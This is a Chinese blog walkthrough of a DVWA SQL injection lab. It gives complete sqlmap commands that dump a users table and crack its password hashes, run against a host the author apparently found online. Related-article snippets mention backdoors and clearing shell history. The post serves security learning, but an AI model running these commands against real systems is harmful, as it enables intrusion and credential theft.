【渗透整理】SQL注入篇(2)

最新推荐文章于 2022-12-08 17:50:09 发布
最新推荐文章于 2022-12-08 17:50:09 发布
阅读量325 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42742658/article/details/103707636
版权

【渗透整理】DVWA SQL Injection —等级:medium

接上一篇的《【渗透整理】SQL注入篇(1)》,这次我们还和上次一样网上随便找一个测试主机(测试用机不要太多)。这次的测试主机:106.54.82.231。游戏开始。

1、搜集信息

在这里插入图片描述没有输入框了,使用一个可选的下拉框,可以知道一共有5个user,我随便点了4提交,F12查看网络,发现这次是用post方式提交,参数为id和submit,并且提交的时候使用了cookie。接下来我们开始构造语句,上sqlmap。

在这里插入图片描述
在这里插入图片描述

2、开始注入

Max HackBar 点开URL,发现url之前的不大一样,直接弄下来用,由于是POST提交,没有/?id 类似的参数,所以url不需要加参数,post的参数使用【–data “内容”】指定即可。

URL:
http://106.54.82.231/DVWA/vulnerabilities/sqli/?http:%2f%2f106.54.82.231%2fDVWA%2fvulnerabilities%2fsqli%2f

post:
id=3&Submit=Submit

网页导出的cookie:
“PHPSESSID=ub0sdd4gv0615iea6gsv8d4134;security=medium;td_cookie=4193961465”

burp suite抓到的cookie:
“td_cookie=4194069765; td_cookie=4193961465; security=medium; PHPSESSID=ub0sdd4gv0615iea6gsv8d4134”

我看了一下,这里两种方式出来的cookie是不一样的,于是我专门去踩雷去了,发现两个cookie都可以直接跟在–cookie参数后面使用,但是burp抓的cookie访问的时候不会出现302问你要不要重定向,你可以一路yes到底结果就出来了,但是网页导出的cookie会出现302重定向提示(可能是一种防护手段),你如果告诉sqlmap是(y)的话,那么不管跑多久,最后都不会有结果的,但是如果你选了否(n),那么恭喜你,我们殊途同归了。

流程开始

1、检测注入点:
python2 sqlmap.py -u “http://106.54.82.231/DVWA/vulnerabilities/sqli/?http:%2f%2f106.54.82.231%2fDVWA%2fvulnerabilities%2fsqli%2f” --cookie=“td_cookie=4194069765; td_cookie=4193961465; security=medium; PHPSESSID=ub0sdd4gv0615iea6gsv8d4134” --data="id=3&Submit=Submit"在这里插入图片描述得到如下结果:
在这里插入图片描述说明存在注入点,可以进行下一步了

2、爆库:
D:\sqlmap\sqlmap>python2 sqlmap.py -u “http://106.54.82.231/DVWA/vulnerabilities/sqli/?http:%2f%2f106.54.82.231%2fDVWA%2fvulnerabilities%2fsqli%2f” --cookie=“td_cookie=4194069765; td_cookie=4193961465; security=medium; PHPSESSID=ub0sdd4gv0615iea6gsv8d4134” --data=“id=3&Submit=Submit” --dbs

在这里插入图片描述结果如下:
在这里插入图片描述3、爆表:
python2 sqlmap.py -u “http://106.54.82.231/DVWA/vulnerabilities/sqli/?http:%2f%2f106.54.82.231%2fDVWA%2fvulnerabilities%2fsqli%2f” --cookie=“td_cookie=4194069765; td_cookie=4193961465; security=medium; PHPSESSID=ub0sdd4gv0615iea6gsv8d4134” --data=“id=3&Submit=Submit” --tables -D“dvwa”
得到如下:

在这里插入图片描述4、爆字段:
python2 sqlmap.py -u “http://106.54.82.231/DVWA/vulnerabilities/sqli/?http:%2f%2f106.54.82.231%2fDVWA%2fvulnerabilities%2fsqli%2f” --cookie=“td_cookie=4194069765; td_cookie=4193961465; security=medium; PHPSESSID=ub0sdd4gv0615iea6gsv8d4134” --data=“id=3&Submit=Submit” --columns -D“dvwa” -T “users”
得到如下:
在这里插入图片描述5、爆内容:
python2 sqlmap.py -u “http://106.54.82.231/DVWA/vulnerabilities/sqli/?http:%2f%2f106.54.82.231%2fDVWA%2fvulnerabilities%2fsqli%2f” --cookie=“td_cookie=4194069765; td_cookie=4193961465; security=medium; PHPSESSID=ub0sdd4gv0615iea6gsv8d4134” --data=“id=3&Submit=Submit” --dump -D“dvwa” -T “users” -C “,user_id,user,password”
得到如下:
在这里插入图片描述这里其实已经爆出我们想要的内容了,但是密码是加密过的,我们想进一步处理的话请继续。

此时sqlmap回显:
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
是否要将散列存储到临时文件中,以便最终使用其他工具进行进一步处理[y/N]y 【选y】

do you want to crack them via a dictionary-based attack? [Y/n/q] y
你想通过基于字典的攻击来破解它们吗?[Y/n/q]y 【选y】

[1] default dictionary file ‘D:\sqlmap\sqlmap\txt\wordlist.zip’ (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
[1] 默认字典文件’D:\ sqlmap\sqlmap\txt\wordlist.zip’(按回车键)
[2] 自定义词典文件
[3] 包含字典文件列表的文件
【选1】

do you want to use common password suffixes? (slow!) [y/N] n
是否要使用常用密码后缀?(慢!)[是/否] 【选N】

由于数据库的密码一般都是ND5加密后存储的,这里实验都是弱口令,所以sqlmap可以用自带的字典把密码明文给撞出来,之后在格式化输出,简直不要太爽。

在这里插入图片描述

3、总结

踩雷burp和网页导出的cookie不一致,下次注意这个问题,还是burp一下心理放心。post型的注入用指定参数的方法完成,用法:–data “提交的参数”。指定参数的方法并不是唯一的方式,其他的方式后面再试。cookie如果有多条的话用分号;隔开,顺序应该不影响结果。sqlmap自带MD5撞库功能,可以省不少事。
还想说圣诞快乐的,写完都一点了。学习使人头秃。

by 久违 2019.12.25

久违 °
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
爬虫——cookie模拟登陆
li123128的博客
09-06 733
http协议为无连接协议,cookie: 存放在客户端浏览器,session: 存放在Web服务器 人人网登录案例 方法一:登录网站手动抓取Cookie 1、先登录成功1次,获取到携带登陆信息的Cookie 登录成功 - 个人主页(http://www.renren.com/971989504/profile) - F12抓包 - 刷新个人主页 - 找到主页的包(home)   一...
渗透测试之SQL注入
Zane·S的博客
04-28 1164
SQL注入基础 SQL注入漏洞的产生需要满足以下两个条件: 参数用户可控:前端传给后端的参数内容是用户可控的; 参数代入数据库查询:传入的参数拼接到SQL语句且带入数据库查询。 与MySQL注入相关的知识点 在MySQL5.0版本之后,MySQL默认在数据库存放一个" information_schema" 的数据库, 在该库中,我们需要记住三个表名 ,分别是"SCHEMATA、TABLES、...
web渗透笔记之sql注入(基础
yida223的博客
04-02 498
判断是否存在注入,注入是字符型还是数字型 1.字符型 输入1,查询成功 输入1’and ‘1’ ='2,查询失败,返回结果为空: 输入1’or '1234 '='1234,查询成功 ///1234用其他代替也可以 ‘返回错误,’ and 1=1 and ‘1’=‘1 页面正常返回结果,’ and 1=2 and ‘1’='1 页面返回错误,说明存在字符型注入 2.数字型 url中 '返回...
渗透
08-15 148
Windows留后门方法: 1、Windows隐藏账号后门的创建 2、LPK后门 3、木马后门,即安装远程控制软件(上兴远控、梦想时代) Linux留后门方法: 1、OpenSSH后门的添加与防范 2、Linux 多个留后门姿势 Linux痕迹清理: 1、bash去掉history记录 export HISTSIZE=0 export HISTFILE=/d...
Python安全之绕过随机Token——使用Brup找出随机Token
weixin_43853965的博客
01-14 641
这是某OA的一个页面,主要功能是供用户提交一些需求,页面有表单和文件上传接口,在对该页面进行安全测试的时候,我希望对这些用户输入表单进行存储型XSS的测试,然而由于页面使用了随机Token,致使用扫描器进行扫描时发现并不能批量写入。于是用Burp进行手工测试。
习科SQL注入系列整理.rar
09-13
在这个“习科SQL注入系列整理”中,我们将会深入探讨这一主题,了解其原理、危害以及防范措施。 一、SQL注入的基本概念 SQL注入是指攻击者通过在Web表单或其他用户输入点插入恶意SQL代码,以欺骗服务器执行非授权的...
Sql注入工具_动力节点Java学院整理
09-09
文章将详细介绍一些常用的SQL注入工具,帮助理解它们的功能和应用场景。 1. **BSQL Hacker**:这款工具由Portcullis实验室开发,专注于SQL盲注,适用于Oracle和MySQL数据库。它为有经验的注入攻击者提供了自动...
最详细的SQL注入相关的命令整理(2)
10-16
标题与描述中的“最详细的SQL注入相关的命令整理(2)”明确指出这是一份关于SQL注入技术的深入资料,尤其关注于具体的SQL注入命令。SQL注入是一种常见的网络安全攻击方式,通过在设计不佳的Web应用程序中输入恶意SQL...
sqlinject-sql注入资料
09-12
通过对现有文献、研究报告和技术文档的综合分析,整理出了关于SQL注入的相关信息和预防技术。 **1.5.2 数据收集方法** 数据主要来源于网络安全领域的专业网站、学术论文和技术博客等。这些资源提供了大量关于SQL...
红队渗透打点工具-FindUpload
最新发布
03-07
FindUpload能自动定位登录界面,让测试人员可以快速进行身份验证测试,检查是否存在SQL注入、XSS等常见安全问题。 4. **定制化扫描规则**:为了适应不同环境和需求,FindUpload允许用户自定义扫描规则,如指定特定...
关于Cookie的原理、作用,区别以及使用
webEmmet
10-15 8万+
很多同学对cookie不太了解,我在这里为大家简单的讲解下关于cookie的一些知识,并将它的存入,读取以及删除封装成了一个函数,在最后做了一个简单的类似购物网站,将商品的信息通过cookie方式存入到购物车,并在购物车还原的代码。
聊一聊 cookie
weixin_34348174的博客
03-07 1948
咱们不搞一开始就一大堆理论知识介绍,怕把人讲懵了...... 咱们换一个思维方式——"从现象看本质",先说说我们看到了什么,再从看到的现象中提出问题,最后深入寻找答案。 我们看到的 cookie 我自己创建了一个网站,网址为http://ppsc.sankuai.com。在这个网页中我设置了几个cookie:JSSESSIONID,PA_...
Cookie/Session机制详解
热门推荐
瞧字不识
11-09 45万+
会话(Session)跟踪是Web程序中常用的技术,用来跟踪用户的整个会话。常用的会话跟踪技术是Cookie与Session。Cookie通过在客户端记录信息确定用户身份,Session通过在服务器端记录信息确定用户身份。 本章将系统地讲述Cookie与Session机制,并比较说明什么时候不能用Cookie,什么时候不能用Session。 1.1  Cookie机制 在程序中,会话
python脚本根据cookies自动登录网站_Python爬虫模拟cookie登陆
weixin_39640573的博客
11-24 444
cookie适用于抓取需要登录才能访问的页面网站cookie和session机制http协议为无连接协议,cookie: 存放在客户端浏览器,session: 存放在Web服务器人人网登录案例方法一:登录网站手动抓取Cookie1、先登录成功1次,获取到携带登陆信息的Cookie登录成功 - 个人主页(http://www.renren.com/971989504/profile) - F12抓包...
渗透测试之sql注入
weixin_46420165的博客
12-08 2182
SQL 注入(SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
使用SQLMAP学习DVWA-SQL Injection(SQL注入
weixin_43838889的博客
04-28 556
SQLMAP 是知名的自动化SQL注入和数据库工具,需要Python环境运行。 本文参考SQLMAP详解 向博主致谢 浏览器F12进入开发者调试界面,将Request Headers部分全部复制保存成dvwa_sqli_low.txt文件。 ##Low 执行sqlmap.py -r dvwa_sqli_low.txt, -r REQUESTFILE Load HTTP request from a file 从文件加载HTTP请求 D:
机器学习算法------4.4 特征工程-特征提取(特征提取、字典特征提取、文本特征提取)
程序猿-凡白的博客
07-21 1169
文章目录4.4 特征工程-特征提取学习目标1 特征提取1.1 定义1.2 特征提取API2 字典特征提取2.1 应用2.2 流程分析2.3 总结3 文本特征提取3.1 应用3.2 流程分析3.3 jieba分词处理3.4 案例分析3.5 Tf-idf文本特征提取3.5.1 公式3.5.2 案例3.6 Tf-idf的重要性4 小结 4.4 特征工程-特征提取 学习目标 了解什么是特征提取 知道字典特征提取操作流程 知道文本特征提取操作流程 知道tfidf的实现思想 什么是特征提取呢? 1 特征提取
SQL Injection4(sqlmap)
kid的博客
04-12 401
SQL Injection4(sqlmap) 前言 前面把手工注入算是简单的练习了一遍,这里来学习下sqlmap,感受下工具的强大。主要也是针对dvwa的sql注入和盲注用sqlmap再来一遍,然后试下文件的上传下载等功能。算是对sqlmap的一个入门吧。 参数 sqlmap的参数真的很多,下面这博客把所有sqlmap -hh的参数都进行了中文翻译,挺方便后面查阅的 超详细SQLMap使用攻略及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

久违 °

小菜鸟就要使劲飞

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值